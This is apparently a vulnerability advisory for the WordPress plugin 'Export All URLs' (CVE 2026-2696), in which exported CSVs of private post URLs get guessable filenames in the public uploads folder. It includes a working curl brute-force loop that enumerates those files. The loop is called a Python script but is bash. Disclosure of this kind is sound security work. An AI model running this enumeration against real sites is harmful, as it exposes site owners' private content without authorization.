Export All URLs < 5.1 – Unauthenticated Sensitive Data Exposure | CVE 2026-2696

Description

The plugin generates CSV filenames containing posts URLS (including private posts) in a predictable pattern using a random 6-digit number. These files are stored in the publicly accessible wp-content/uploads/ directory. As a result, any unauthenticated user can brute-force the filenames to gain access to sensitive data contained within the exported files.

Proof of Concept

As an admin, use the export tool to generate a CSV containing private posts.

As an unauthenticated user, you can use the following Python script to check for accessible CSV files

```
for i in {111111..999999}; do
    url="http://example.com/wp-content/uploads/2026/02/export-all-urls-${i}.CSV"
    status=$(curl -o /dev/null -s -w "%{http_code}" "$url")
    if [ "$status" -eq 200 ]; then
        echo "[+] Found: $url"
    fi
done
```

Once the script returns a `200` you can download the CSV and will see URLs of private posts.